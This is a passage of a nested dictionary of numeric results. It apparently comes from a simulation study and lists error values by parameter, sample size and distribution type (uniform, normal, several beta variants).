0.042678379119217236}, 300: {'uni': 0.06864694129034321, 'nor': 0.1588340869015541, 'beta1': 0.061657151171832125, 'beta2': 0.11908535230283115, 'beta4': 0.049311269074143405}, 200: {'uni': 0.08082515275880864, 'nor': 0.1653404286408089, 'beta1': 0.07528213929157085, 'beta2': 0.12905037545647996, 'beta4': 0.06078472833045673}, 150: {'uni': 
0.09067340943954105, 'nor': 0.1719167421754575, 'beta1': 0.08654348956789837, 'beta2': 0.1377516058425463, 'beta4': 0.07049778930105871}, 100: {'uni': 0.1086666058987017, 'nor': 0.18582138140525045, 'beta1': 0.10555332688519786, 'beta2': 0.1520573786986546, 'beta4': 0.08771942043391467}, 75: {'uni': 0.12367516250114241, 'nor': 0.1936529244743188, 'beta1': 0.12127286264345238, 'beta2': 0.16320255408908907, 'beta4': 0.10226685365525778}, 50: {'uni': 0.14913935597178152, 'nor': 0.2158588407634494, 'beta1': 0.14842740385680675, 'beta2': 0.18610463716939651, 'beta4': 0.1264269525886395}, 30: {'uni': 0.1894435241919467, 'nor': 0.24698362415268657, 'beta1': 0.1902052475438244, 'beta2': 0.2208874403100017, 'beta4': 0.16740207123414985}, 20: {'uni': 0.23045459417674147, 'nor': 0.2799231266745311, 'beta1': 0.23095718339914606, 'beta2': 0.25625627348359864, 'beta4': 0.20847547734226834}, 10: {'uni': 0.3184035049947215, 'nor': 0.36156368323481775, 'beta1': 0.31812314781434214, 'beta2': 0.3366009664560641, 'beta4': 0.30273632497052144}}, 10: {1000: {'uni': 0.08279938794024366, 'nor': 0.20746864987159275, 'beta1': 0.08963877760273378, 'beta2': 0.13088236164799233, 'beta4': 0.02673844765905936}, 750: {'uni': 0.08426832961599184, 'nor': 0.20874280374404391, 'beta1': 0.08955811722492701, 'beta2': 0.13542495464202575, 'beta4': 0.03080220729065536}, 500: {'uni': 0.08659140770361992, 'nor': 0.21132286282870372, 'beta1': 0.08971002227585745, 'beta2': 0.137474594046657, 'beta4': 0.03774600933075223}, 400: {'uni': 0.08845482467918225, 'nor': 0.21371189689386383, 'beta1': 0.0897073855362439, 'beta2': 0.14244766972162892, 'beta4': 0.0421496940463395}, 300: {'uni': 0.09163999186977767, 'nor': 0.21681989561836174, 'beta1': 0.089886875954427, 'beta2': 0.14494850873515852, 'beta4': 0.048801996044743334}, 200: {'uni': 0.09824982646268379, 'nor': 0.2229381862621922, 'beta1': 0.09064463588385452, 'beta2': 0.15207622316955471, 'beta4': 0.05991506202414604}, 150: {'uni': 0.10597878355719062, 'nor': 
0.22906946762966052, 'beta1': 0.0914691379185335, 'beta2': 0.15947859758245603, 'beta4': 0.06920496232883624}, 100: {'uni': 0.1204073194961825, 'nor': 0.23747551585427307, 'beta1': 0.10577014356758019, 'beta2': 0.17148307936029666, 'beta4': 0.08496381763696761}, 75: {'uni': 0.1334590836264363, 'nor': 0.2501046310309356, 'beta1': 0.12291423498596181, 'beta2': 0.1820777815006388, 'beta4': 0.09937452733840269}, 50: {'uni': 0.15659478623743123, 'nor': 0.2649487192543656, 'beta1': 0.14785603195288383, 'beta2': 0.20366919537172168, 'beta4': 0.12201244106590736}, 30: {'uni': 0.19399803736356186, 'nor': 0.29471369014840654, 'beta1': 0.18900850606731456, 'beta2': 0.23377561600860308, 'beta4': 0.15979617861494677}, 20: {'uni': 0.2327209769876345, 'nor': 0.3216648320505805, 'beta1': 0.22968888409928068, 'beta2': 0.2662874109164176, 'beta4': 0.19955725481302533}, 10: {'uni': 0.3167985271399704, 'nor': 0.3980931466618715, 'beta1': 0.3167971014813921, 'beta2': 0.34276356880144665, 'beta4': 0.28980968413230446}}}, 0.25: {1000: {1000: {'uni': 0.03199275137995117, 'nor': 0.0377612558253515, 'beta1': 0.03207386640216253, 'beta2': 0.051317660480200256, 'beta4': 0.029150123111011506}, 750: {'uni': 0.036938790221011875, 'nor': 0.042241745609793546, 'beta1': 0.03708565565300198, 'beta2': 0.05311937295175995, 'beta4': 0.034313693230411}, 500: {'uni': 0.04518467957852923, 'nor': 0.04973246769105877, 'beta1': 0.045095608233479745, 'beta2': 0.0579300692476834, 'beta4': 0.04254589117113883}, 400: {'uni': 0.0502034071958003, 'nor': 0.05454115588980907, 'beta1': 0.05055080954159219, 'beta2': 0.061161550088231986, 'beta4': 0.04797066239068751}, 300: {'uni': 0.058494397771818585, 'nor': 0.062028740711859265, 'beta1': 0.05833380007137132, 'beta2': 0.06798358010263028, 'beta4': 0.05630460494121223}, 200: {'uni': 0.07096438668841598, 'nor': 0.07412020377216044, 'beta1': 0.07133115327499512, 'beta2': 0.07896884752622757, 'beta4': 0.06907818308168096}, 150: {'uni': 0.08208505648349079, 'nor': 
0.08447429233523951, 'beta1': 0.08184669107075387, 'beta2': 0.08801509549599151, 'beta4': 0.07992744012646691}, 100: {'uni': 0.10004565549548194, 'nor': 0.10237522390461173, 'beta1': 0.0999275224639195, 'beta2': 0.10532128217368142, 'beta4': 0.0988563106856703}, 75: {'uni': 0.11589185212999692, 'nor': 0.11807251171646749, 'beta1': 0.11485210164860138, 'beta2': 0.12031055325904372, 'beta4': 0.11412331652115923}, 50: {'uni': 0.14049191983680576, 'nor': 0.14195558645235828, 'beta1': 0.14048079336364855, 'beta2': 0.14452775406933738, 'beta4': 0.13989919886563593}, 30: {'uni': 0.18085720286815, 'nor': 0.18147395490124796, 'beta1': 0.1801423435578804, 'beta2': 0.1829095154193338, 'beta4': 0.17865742454053038}, 20: {'uni': 0.2188793664518785, 'nor': 0.2205153587206411, 'beta1': 0.2189194895346508, 'beta2': 0.2208849473005658, 'beta4': 0.21926359723489885}, 10: {'uni': 0.30590762068535415, 'nor': 0.3074011033419454, 'beta1': 0.3065343123341402, 'beta2': 0.3079808039413954, 'beta4': 0.3041198788346453}}, 750: {1000: {'uni': 0.032368347030127004, 'nor': 0.039495932165949266, 'beta1': 0.032127527217265195, 'beta2': 0.05096820210071745, 'beta4': 0.028616305560898614}, 750: {'uni': 0.03713885168013714, 'nor': 0.043817159608602774, 'beta1': 0.0367837672562607, 'beta2': 0.05312860283337206, 'beta4': 0.033712076422947546}, 500: {'uni': 0.04514502478230087, 'nor': 0.050939113474436026, 'beta1': 0.04537187336954829, 'beta2': 0.05849377906681347, 'beta4': 0.04188494892464878}, 400: {'uni': 0.050330802291682186, 'nor': 0.055505230954840445, 'beta1': 0.050734669077095895, 'beta2': 0.06247764901879249, 'beta4': 0.04742928078021369}, 300: {'uni': 0.05864673808177773, 'nor': 0.06291114299630962, 'beta1': 0.05852603179278021, 'beta2': 0.06804203235154582, 'beta4': 0.05550944554210635}, 200: {'uni': 0.07110774959507277, 'nor': 0.0750417803744845, 'beta1': 0.07108558678723764, 'beta2': 0.07979409652007075, 'beta4': 0.06858026018509678}, 150: {'uni': 0.08247125828473023, 'nor': 
0.08547463541022982, 'beta1': 0.08215710788274455, 'beta2': 0.08848680474820936, 'beta4': 0.0796438596153346}, 100: {'uni': 0.10109208297439909, 'nor': 0.10352781679515655, 'beta1': 0.1006336182710834, 'beta2': 0.10634244051752054, 'beta4': 0.09786482796671303}, 75: {'uni': 0.11522357484837831, 'nor': 0.11827499297282096, 'beta1': 0.1159196515430023, 'beta2': 0.12014424072164931, 'beta4': 0.11380644122735906}, 50: {'uni': 0.14060642168956575, 'nor': 0.1432810536145968, 'beta1': 0.1404685185904413, 'beta2': 0.14445981166680172, 'beta4': 0.14025485753096134}, 30: {'uni': 0.18144382340878018, 'nor': 0.18220171362137827, 'beta1': 0.18019204096546904, 'beta2': 0.18336020074753134, 'beta4': 0.17996933419550307}, 20: {'uni': 0.2198405269160041, 'nor': 0.21972983923644784, 'beta1': 0.2207144033629308, 'beta2': 0.22254113568844458, 'beta4': 0.21995845947855397}, 10: {'uni': 0.30707583033219277, 'nor': 0.30677572835070843, 'beta1': 0.307186086020681, 'beta2': 0.3087181699800424, 'beta4': 0.30403958473809867}}, 500: {1000: {'uni': 0.031998610331581856, 'nor': 0.04277431287550973, 'beta1': 0.03202380702522861, 'beta2': 0.053247212628520835, 'beta4': 0.028106826865999635}, 750: {'uni': 0.0368150729172666, 'nor': 0.046175305332631256, 'beta1': 0.036955925234784415, 'beta2': 0.055430828654678854, 'beta4': 0.033006186200381704}, 500: {'uni': 0.045327422254650696, 'nor': 0.053320028563376476, 'beta1': 0.04521124170257684, 'beta2': 0.06079825113216919, 'beta4': 0.04125585885231965}, 400: {'uni': 0.05058625293211194, 'nor': 0.05811521301238065, 'beta1': 0.05047854919479744, 'beta2': 0.0644472021193534, 'beta4': 0.04657197609011046}, 300: {'uni': 0.05837680448123017, 'nor': 0.06554961214753685, 'beta1': 0.05832160254575547, 'beta2': 0.07045708483321578, 'beta4': 0.05450035709303813}, 200: {'uni': 0.07137488269124403, 'nor': 0.0765816734100554, 'beta1': 0.07097260906025193, 'beta2': 0.08122687128901757, 'beta4': 0.06810904430297748}, 150: {'uni': 0.08171768121444029, 'nor': 
0.08706245424314168, 'beta1': 0.08224852816102035, 'beta2': 0.09206848284106278, 'beta4': 0.07864927350348105}, 100: {'uni': 0.10001354205421553, 'nor': 0.10494588642600383, 'beta1': 0.10032083676885117, 'beta2': 0.1073252427285255, 'beta4': 0.09755420704181944}, 75: {'uni': 0.11496296171371789, 'nor': 0.11892336415280835, 'beta1': 0.11573445907704838, 'beta2': 0.1221024266233946, 'beta4': 0.11312234604041477}, 50: {'uni': 0.1406991966723249, 'nor': 0.14434822688745969, 'beta1': 0.1408991819394264, 'beta2': 0.14576451960892592, 'beta4': 0.1390064572124975}, 30: {'uni': 0.18087047323939087, 'nor': 0.1829040634798727, 'beta1': 0.18054920049463752, 'beta2': 0.18399230494708463, 'beta4': 0.17823513722522538}, 20: {'uni': 0.21939938602159992, 'nor': 0.22182287755317703, 'beta1': 0.22045130781379252, 'beta2': 0.22290813512523416, 'beta4': 0.21814484703021253}, 10: {'uni': 0.3060836645742364, 'nor': 0.3091515297248897, 'beta1': 0.3066663173709814, 'beta2': 0.3075083864383387, 'beta4': 0.30422501574238897}}, 400: {1000: {'uni': 0.032005088669465276, 'nor': 0.04456557950368989, 'beta1': 0.03207047760229875, 'beta2': 0.05335428637134554, 'beta4': 0.02764205849240342}, 750: {'uni': 0.03707438658946127, 'nor': 0.048852635452191456, 'beta1': 0.037059120244776866, 'beta2': 0.05545369912568332, 'beta4': 0.03250465520660134}, 500: {'uni': 0.04527161577889338, 'nor': 0.05510988745673151, 'beta1': 0.0454293101810781, 'beta2': 0.061105496120222313, 'beta4': 0.04074431956109695}, 400: {'uni': 0.05033443638682883, 'nor': 0.059551554506442894, 'beta1': 0.050241105416355736, 'beta2': 0.06506528423110045, 'beta4': 0.045759081418304426}, 300: {'uni': 0.058211459729823334, 'nor': 0.06646450082163013, 'beta1': 0.05824726492475796, 'beta2': 0.07136706424691125, 'beta4': 0.05371853302556494}, 200: {'uni': 0.07136004884006591, 'nor': 0.07847889640933037, 'beta1': 0.07119158271516751, 'beta2': 0.0828087241613199, 'beta4': 0.066989888959891}, 150: {'uni': 0.08226981215061391, 'nor': 
0.08787491015723636, 'beta1': 0.0820213556261612, 'beta2': 0.0922395433103187, 'beta4': 0.0782455680987506}, 100: {'uni': 0.0999425967371041, 'nor': 0.1055486790460004, 'beta1': 0.09960125420912624, 'beta2': 0.1088178339306568, 'beta4': 0.09699734407107313}, 75: {'uni': 0.11616131437111837, 'nor': 0.11979183643647795, 'beta1': 0.11556364812719394, 'beta2': 0.12237760407249698, 'beta4': 0.1124749001044939}, 50: {'uni': 0.14107921330185552, 'nor': 0.14436563346328762, 'beta1': 0.14060580635640263, 'beta2': 0.14613157564214374, 'beta4': 0.13891710396762352}, 30: {'uni': 0.18030508328138095, 'nor': 0.18482261222058646, 'beta1': 0.18024669252888958, 'beta2': 0.18503042752212556, 'beta4': 0.17833798147699706}, 20: {'uni': 0.21972895156921568, 'nor': 0.22310165064904985, 'beta1': 0.21906869562507247, 'beta2': 0.2237444999736099, 'beta4': 0.21783462233689643}, 10: {'uni': 0.3045782011808965, 'nor': 0.30585595084735995, 'beta1': 0.3062967507461382, 'beta2': 0.30905483197965655, 'beta4': 0.3053249816659628}}, 300: {1000: {'uni': 0.032239084457734934, 'nor': 0.04761428127094802, 'beta1': 0.032038173010609405, 'beta2': 0.05574065007123413, 'beta4': 0.027269701240414}, 750: {'uni': 0.037163331746985356, 'nor': 0.05159782362000957, 'beta1': 0.03687151259245286, 'beta2': 0.057493247342013665, 'beta4': 0.032126332878003705}, 500: {'uni': 0.04518027895134363, 'nor': 0.05830373631162644, 'beta1': 0.045342369983153, 'beta2': 0.06302093871729986, 'beta4': 0.03992543574842056}, 400: {'uni': 0.05041660540845222, 'nor': 0.06273062597571621, 'beta1': 0.050506925792484725, 'beta2': 0.06679374494442292, 'beta4': 0.0453809683918249}, 300: {'uni': 0.05819791840262872, 'nor': 0.06889853173644056, 'beta1': 0.05881589576054247, 'beta2': 0.07548404171599854, 'beta4': 0.05330460648413682}, 200: {'uni': 0.07099409803866191, 'nor': 0.08015771733382343, 'beta1': 0.07149914372253519, 'beta2': 0.08491818197910528, 'beta4': 0.0660207111886566}, 150: {'uni': 0.08165348909753622, 'nor': 
0.09041841839558967, 'beta1': 0.08186412904658036, 'beta2': 0.09446598626929148, 'beta4': 0.07704328735244007}, 100: {'uni': 0.10032050128616843, 'nor': 0.10736683019992799, 'beta1': 0.10052095271344208, 'beta2': 0.11016773078480463, 'beta4': 0.09642704867227114}, 75: {'uni': 0.11561316546647915, 'nor': 0.12094802011662908, 'beta1': 0.11523834024523168, 'beta2': 0.12439262057779943, 'beta4': 0.11152777353064466}, 50: {'uni': 0.14018486722638512, 'nor': 0.14571982545039386, 'beta1': 0.14112158063583297, 'beta2': 0.1477125646402092, 'beta4': 0.13703508806923154}, 30: {'uni': 0.18072304976823583, 'nor': 0.1846706102625543, 'beta1': 0.18032073445217073, 'beta2': 0.18543660392632166, 'beta4': 0.1774188167718942}, 20: {'uni': 0.22002473058377936, 'nor': 0.22233988983477326, 'beta1': 0.219611410295673, 'beta2': 0.2238362766248162, 'beta4': 0.21760444529561554}, 10: {'uni': 0.30592439821930945, 'nor': 0.3083597959740417, 'beta1': 0.3068948351628876, 'beta2': 0.3076071685456584, 'beta4': 0.3053936839900976}}, 200: {1000: {'uni': 0.032145127804773244, 'nor': 0.05349333747510293, 'beta1': 0.0319567056231127, 'beta2': 0.05863229193574737, 'beta4': 0.02689596641142078}, 750: {'uni': 0.03706566197402705, 'nor': 0.05686923973969488, 'beta1': 0.03685443931928145, 'beta2': 0.061233105783269015, 'beta4': 0.03135246921457169}, 500: {'uni': 0.045287310383440804, 'nor': 0.06333268823272437, 'beta1': 0.04543966891783402, 'beta2': 0.06633448987394563, 'beta4': 0.039157769206374704}, 400: {'uni': 0.05058001358487568, 'nor': 0.06756534858480051, 'beta1': 0.05056634568175178, 'beta2': 0.07314321695984138, 'beta4': 0.04408417011680896}, 300: {'uni': 0.0584055924161348, 'nor': 0.07369190108393786, 'beta1': 0.05857816948096051, 'beta2': 0.07848195518441148, 'beta4': 0.05169771628815578}, 200: {'uni': 0.07130150466307517, 'nor': 0.08467495205397024, 'beta1': 0.07127183814358251, 'beta2': 0.0881972753860466, 'beta4': 0.06459411653988484}, 150: {'uni': 0.08230542143096298, 'nor': 
0.09388689821838958, 'beta1': 0.0823575524673264, 'beta2': 0.09843414713564969, 'beta4': 0.07600083070681307}, 100: {'uni': 0.09992259917931273, 'nor': 0.11061606520328848, 'beta1': 0.10091421972922207, 'beta2': 0.11274797159715078, 'beta4': 0.09405990854917767}, 75: {'uni': 0.1146453681089189, 'nor': 0.1243577334515438, 'beta1': 0.11572896766854551, 'beta2': 0.126786382446473, 'beta4': 0.10989836905325345}, 50: {'uni': 0.1408283945272606, 'nor': 0.14854443655662386, 'beta1': 0.14077373626256007, 'beta2': 0.15015510894940037, 'beta4': 0.1362970789621657}, 30: {'uni': 0.18065144082287762, 'nor': 0.18602556667128156, 'beta1': 0.18024583757633306, 'beta2': 0.187119560361907, 'beta4': 0.1768157942624079}, 20: {'uni': 0.21915855466007622, 'nor': 0.2250505751776598, 'beta1': 0.21842255121376986, 'beta2': 0.2247693098465804, 'beta4': 0.21625303838766974}, 10: {'uni': 0.3069805298827638, 'nor': 0.3088397242466276, 'beta1': 0.3053746544466997, 'beta2': 0.3098571203920325, 'beta4': 0.30339983933013226}}, 150: {1000: {'uni': 0.03222316489755345, 'nor': 0.05945194607376453, 'beta1': 0.03207935408945817, 'beta2': 0.06079634191773392, 'beta4': 0.026527269808695464}, 750: {'uni': 0.0370321650244374, 'nor': 0.0617883925674626, 'beta1': 0.03711700730448053, 'beta2': 0.06372190827907176, 'beta4': 0.03096740102793627}, 500: {'uni': 0.04532144365663909, 'nor': 0.0680586194258842, 'beta1': 0.04536848896627477, 'beta2': 0.07251693015188532, 'beta4': 0.03866327712014228}, 400: {'uni': 0.0505977822228203, 'nor': 0.07203749527198017, 'beta1': 0.050685474943401365, 'beta2': 0.07485785669758882, 'beta4': 0.04352869184910363}, 300: {'uni': 0.057965032685755036, 'nor': 0.07790764637502356, 'beta1': 0.058658948406533795, 'beta2': 0.08098586671063707, 'beta4': 0.050983529052287424}, 200: {'uni': 0.0710371027428352, 'nor': 0.08820871252384349, 'beta1': 0.07148282244840176, 'beta2': 0.0914952470037026, 'beta4': 0.06346089963043011}, 150: {'uni': 0.08207640995751564, 'nor': 0.09766509211855923, 
'beta1': 0.08167656775849508, 'beta2': 0.10012999401461498, 'beta4': 0.07427821448227956}, 100: {'uni': 0.09994734914200143, 'nor': 0.1129459883944704, 'beta1': 0.09980539436202157, 'beta2': 0.11592632608795883, 'beta4': 0.09304062628193266}, 75: {'uni': 0.11553236151223506, 'nor': 0.1273360867115455, 'beta1': 0.11561304775458114, 'beta2': 0.12896122578621239, 'beta4': 0.10856651888369684}, 50: {'uni': 0.1401267895773386, 'nor': 0.150874223818793, 'beta1': 0.14106509605862422, 'beta2': 0.15309480271707476, 'beta4': 0.13434799522511576}, 30: {'uni': 0.18100210887716317, 'nor': 0.18846250113659102, 'beta1': 0.18108600475737724, 'beta2': 0.18820408383757903, 'beta4': 0.1744893497548229}, 20: {'uni': 0.22007531711429196, 'nor': 0.22624986333580377, 'beta1': 0.22105754134774402, 'beta2': 0.2254264398404922, 'beta4': 0.21671616234795646}, 10: {'uni': 0.30579411743746077, 'nor': 0.31037044747734677, 'beta1': 0.30727843528835264, 'beta2': 0.3098797929188794, 'beta4': 0.30316988477280543}}, 100: {1000: {'uni': 0.03274216345456671, 'nor': 0.06775327941395048, 'beta1': 0.032061342840036255, 'beta2': 0.06382316122578824, 'beta4': 0.026316312803939867}, 750: {'uni': 0.037579409945831976, 'nor': 0.07067264993908817, 'beta1': 0.036944834310432384, 'beta2': 0.06667491200402953, 'beta4': 0.03049780432266838}, 500: {'uni': 0.045626044711458535, 'nor': 0.07640799770080187, 'beta1': 0.045208821668136, 'beta2': 0.07491373191518652, 'beta4': 0.03785430223359623}, 400: {'uni': 0.05090625729095505, 'nor': 0.07934795957920815, 'beta1': 0.05066551543139719, 'beta2': 0.07868508780911171, 'beta4': 0.04264742804290289}, 300: {'uni': 0.05839819477500041, 'nor': 0.08457660157789437, 'beta1': 0.05827469063418195, 'beta2': 0.0836305486592761, 'beta4': 0.05014012449638705}, 200: {'uni': 0.07131120343453617, 'nor': 0.09564864803002038, 'beta1': 0.07121453603448036, 'beta2': 0.09501904926088, 'beta4': 0.06199710926061397}, 150: {'uni': 0.0824632894282834, 'nor': 0.10351775253135054, 'beta1': 
0.08222593298518815, 'beta2': 0.10403737737010954, 'beta4': 0.07317445595779534}, 100: {'uni': 0.10027559659721097, 'nor': 0.11911693503739967, 'beta1': 0.10035631836386402, 'beta2': 0.11905850690926911, 'beta4': 0.09115925777533135}, 75: {'uni': 0.11533926378096324, 'nor': 0.13293086862293707, 'beta1': 0.11550021587841142, 'beta2': 0.13242283015048073, 'beta4': 0.10583595257901535}, 50: {'uni': 0.14125461490836977, 'nor': 0.15481343079067678, 'beta1': 0.14083804530729904, 'beta2': 0.15486187856446598, 'beta4': 0.13213869045119073}, 30: {'uni': 0.18067693462898593, 'nor': 0.19209904272032094, 'beta1': 0.18048591905655675, 'beta2': 0.19132292898534176, 'beta4': 0.1731204060059379}, 20: {'uni': 0.2194497761344132, 'nor': 0.22952776186358645, 'beta1': 0.2210084936336856, 'beta2': 0.2277523801643781, 'beta4': 0.21401777417550116}, 10: {'uni': 0.30491836630916047, 'nor': 0.3136863210929642, 'beta1': 0.3059618384293903, 'beta2': 0.31145305621358244, 'beta4': 0.30218740315401166}}, 75: {1000: {'uni': 0.03296804299574074, 'nor': 0.07502584510325999, 'beta1': 0.03198909471182765, 'beta2': 0.06627849631603855, 'beta4': 0.026018303221585604}, 750: {'uni': 0.03781889522611104, 'nor': 0.07750171416392093, 'beta1': 0.03709295438746274, 'beta2': 0.06966374591084012, 'beta4': 0.030083456649105722}, 500: {'uni': 0.04588611395620795, 'nor': 0.0832308871539903, 'beta1': 0.04503188517914297, 'beta2': 0.0778680999061172, 'beta4': 0.037422494765473796}, 400: {'uni': 0.05103896713119821, 'nor': 0.08624943932637474, 'beta1': 0.050515142768203625, 'beta2': 0.08092558102345371, 'beta4': 0.04214991872531762}, 300: {'uni': 0.058619489540432834, 'nor': 0.09218377722158483, 'beta1': 0.05833566460055162, 'beta2': 0.08767072534918796, 'beta4': 0.04948056049731009}, 200: {'uni': 0.07142937649921666, 'nor': 0.10153881530955883, 'beta1': 0.0711962247024438, 'beta2': 0.09878624986895768, 'beta4': 0.06114388931769735}, 150: {'uni': 0.0818160837503934, 'nor': 0.10962021535420124, 'beta1': 
0.0821248472699912, 'beta2': 0.10678592690352856, 'beta4': 0.07201635109029625}, 100: {'uni': 0.10033935923350429, 'nor': 0.12400158701587738, 'beta1': 0.10019144115697398, 'beta2': 0.12257338875860513, 'beta4': 0.08958751642761531}, 75: {'uni': 0.11463620909947292, 'nor': 0.13729280250456427, 'beta1': 0.11545358481112064, 'beta2': 0.13533805566311075, 'beta4': 0.10463860294573568}, 50: {'uni': 0.14041083829724632, 'nor': 0.1601934699301324, 'beta1': 0.14118094481810134, 'beta2': 0.15649100485487455, 'beta4': 0.13079204536225447}, 30: {'uni': 0.17941841118483848, 'nor': 0.19432333539672053, 'beta1': 0.18108637707222786, 'beta2': 0.1940514148883128, 'beta4': 0.17116345309006809}, 20: {'uni': 0.2191045954547003, 'nor': 0.23156916864980065, 'beta1': 0.21958539239874875, 'beta2': 0.2288693020710007, 'beta4': 0.2111983732891391}, 10: {'uni': 0.3076647019304655, 'nor': 0.3173691048923303, 'beta1': 0.30576781526816577, 'beta2': 0.3130098845736485, 'beta4': 0.2972158297961716}}, 50: {1000: {'uni': 0.03433430022899808, 'nor': 0.08842102532667545, 'beta1': 0.03223331907376098, 'beta2': 0.07277518065743305, 'beta4': 0.02588821628662097}, 750: {'uni': 0.03887126446259914, 'nor': 0.0910846873593219, 'beta1': 0.036951578170920873, 'beta2': 0.07622969912474264, 'beta4': 0.03006036248745808}, 500: {'uni': 0.04689196532878104, 'nor': 0.09593657648017129, 'beta1': 0.04503241099014954, 'beta2': 0.08323295043032963, 'beta4': 0.03714881820594479}, 400: {'uni': 0.051774246404964364, 'nor': 0.09916078860193034, 'beta1': 0.0505571321231062, 'beta2': 0.08730017553432268, 'beta4': 0.04159182778940329}, 300: {'uni': 0.059150975430708325, 'nor': 0.10379530845713192, 'beta1': 0.05822224483584626, 'beta2': 0.09363761776791535, 'beta4': 0.04832173433265907}, 200: {'uni': 0.0716859637391355, 'nor': 0.11234734351192865, 'beta1': 0.07094419045693312, 'beta2': 0.10324004723700275, 'beta4': 0.059980305787279864}, 150: {'uni': 0.08266517102902693, 'nor': 0.12043265249847296, 'beta1': 
0.08183417503139817, 'beta2': 0.11217584960878624, 'beta4': 0.07046469195355531}, 100: {'uni': 0.10054768121870128, 'nor': 0.13395983977474127, 'beta1': 0.09972911370096887, 'beta2': 0.12640535172959536, 'beta4': 0.08769745435863463}, 75: {'uni': 0.11506440143566307, 'nor': 0.1461475325877074, 'beta1': 0.11504294118932046, 'beta2': 0.1391005160652219, 'beta4': 0.10257774239474937}, 50: {'uni': 0.1405096759295903, 'nor': 0.16839269038201765, 'beta1': 0.13993583438148083, 'beta2': 0.16161227714177773, 'beta4': 0.12805930575607483}, 30: {'uni': 0.18017995907272144, 'nor': 0.20200364133487392, 'beta1': 0.18055279602385688, 'beta2': 0.19608371098558458, 'beta4': 0.1683674379324781}, 20: {'uni': 0.21805138604748409, 'nor': 0.23779035600849233, 'beta1': 0.21986203616531452, 'beta2': 0.23327926081944855, 'beta4': 0.2082804112449691}, 10: {'uni': 0.3040705295399263, 'nor': 0.32031549693696865, 'beta1': 0.3066804021631311, 'beta2': 0.31327311772302824, 'beta4': 0.2972068392863597}}, 30: {1000: {'uni': 0.03871017016879641, 'nor': 0.11049883217909062, 'beta1': 0.032247812148711405, 'beta2': 0.0805454176845462, 'beta4': 0.02559841016582587}, 750: {'uni': 0.042769108003219106, 'nor': 0.11296398305504446, 'beta1': 0.03699026418458462, 'beta2': 0.08466666160065073, 'beta4': 0.02979787689834079}, 500: {'uni': 0.04978362867791797, 'nor': 0.11784520617150873, 'beta1': 0.045160080333170705, 'beta2': 0.09071832655647427, 'beta4': 0.03657944795279622}, 400: {'uni': 0.054244251799578425, 'nor': 0.120664612299139, 'beta1': 0.05055449392108258, 'beta2': 0.09478104392591502, 'beta4': 0.041067052741879134}, 300: {'uni': 0.06146708324946404, 'nor': 0.12458558674066761, 'beta1': 0.05823153766200054, 'beta2': 0.10042052998914, 'beta4': 0.04754493134712555}, 200: {'uni': 0.07360874613430221, 'nor': 0.1329409951894065, 'beta1': 0.0712112137494094, 'beta2': 0.11080986220563926, 'beta4': 0.05867823822711815}, 150: {'uni': 0.08397023944800297, 'nor': 0.1390438256951947, 'beta1': 0.08237631752937374, 
'beta2': 0.11918607548226523, 'beta4': 0.06866317554335899}, 100: {'uni': 0.10128809169151631, 'nor': 0.1517267646035071, 'beta1': 0.09972424769262522, 'beta2': 0.1354500191068707, 'beta4': 0.0849190667878878}, 75: {'uni': 0.11597845714700927, 'nor': 0.16309000570623827, 'beta1': 0.11559498237300614, 'beta2': 0.14589154324925346, 'beta4': 0.0999162933165636}, 50: {'uni': 0.14069800262255838, 'nor': 0.1839187462219669, 'beta1': 0.13981209728742372, 'beta2': 0.16778239734387568, 'beta4': 0.12425346462613163}, 30: {'uni': 0.1797446733169624, 'nor': 0.21644972902621398, 'beta1': 0.18059243359809551, 'beta2': 0.20202152261026132, 'beta4': 0.1636678723512469}, 20: {'uni': 0.21937480663500575, 'nor': 0.2497527953300106, 'beta1': 0.21979044357993877, 'beta2': 0.2359411650840486, 'beta4': 0.20332953036428597}, 10: {'uni': 0.30351794338910415, 'nor': 0.329349286588422, 'beta1': 0.3059412686044445, 'beta2': 0.31726353751068403, 'beta4': 0.291909252822552}}, 20: {1000: {'uni': 0.04786473758448062, 'nor': 0.13448854973910773, 'beta1': 0.0474900351548871, 'beta2': 0.09274155108383075, 'beta4': 0.025530278131800782}, 750: {'uni': 0.05039616783397134, 'nor': 0.135064704569215, 'beta1': 0.04765005160770225, 'beta2': 0.09674441211509341, 'beta4': 0.029683541983339667}, 500: {'uni': 0.05547762205023854, 'nor': 0.14001720599630382, 'beta1': 0.048106962180010204, 'beta2': 0.09953924927118829, 'beta4': 0.036370817128490524}, 400: {'uni': 0.05974197156622235, 'nor': 0.14172064957995056, 'beta1': 0.050872352437056095, 'beta2': 0.10418161630558852, 'beta4': 0.040764857091411755}, 300: {'uni': 0.06524051543131026, 'nor': 0.14595220600119096, 'beta1': 0.05848865491478826, 'beta2': 0.10998005813512912, 'beta4': 0.04701701027264421}, 200: {'uni': 0.0770744511637107, 'nor': 0.1547803767946513, 'beta1': 0.07133133392276658, 'beta2': 0.12003921068285384, 'beta4': 0.05833256338473064}, 150: {'uni': 0.08698214434451997, 'nor': 0.15954648186161546, 'beta1': 0.08183176545570486, 'beta2': 
0.12777944293922183, 'beta4': 0.0675035999630012}, 100: {'uni': 0.10375409883656361, 'nor': 0.17061333037285303, 'beta1': 0.10022434196661106, 'beta2': 0.14179923508732106, 'beta4': 0.08374673612833905}, 75: {'uni': 0.11797678653950688, 'nor': 0.18236373219061275, 'beta1': 0.11557026107752538, 'beta2': 0.15377848750968914, 'beta4': 0.09757004251626233}, 50: {'uni': 0.14172731535262179, 'nor': 0.20038698791993043, 'beta1': 0.14046926902337709, 'beta2': 0.1743686159633676, 'beta4': 0.12110025961019322}, 30: {'uni': 0.18039349397749566, 'nor': 0.23067978968795344, 'beta1': 0.18045976448956377, 'beta2': 0.2072893207928338, 'beta4': 0.1592884038412401}, 20: {'uni': 0.21805931381049123, 'nor': 0.2651676956522234, 'beta1': 0.2177278691596758, 'beta2': 0.24147576401840687, 'beta4': 0.19939491723223757}, 10: {'uni': 0.30440975524739855, 'nor': 0.3384425023063676, 'beta1': 0.30324741022916285, 'beta2': 0.3185465132986438, 'beta4': 0.28767747944269173}}, 10: {1000: {'uni': 0.07946518628481158, 'nor': 0.19045003908328084, 'beta1': 0.08877611003813457, 'beta2': 0.1215657503670089, 'beta4': 0.025503535463525406}, 750: {'uni': 0.08130748653818165, 'nor': 0.19076450111902787, 'beta1': 0.0888890045454918, 'beta2': 0.1243044166371681, 'beta4': 0.02964909526636217}, 500: {'uni': 0.0836110010994472, 'nor': 0.19475368394850967, 'beta1': 0.08883318435651434, 'beta2': 0.12587466253680676, 'beta4': 0.03601840756954122}, 400: {'uni': 0.08549487851383872, 'nor': 0.19779586035735008, 'beta1': 0.08896831846511888, 'beta2': 0.12932758634367436, 'beta4': 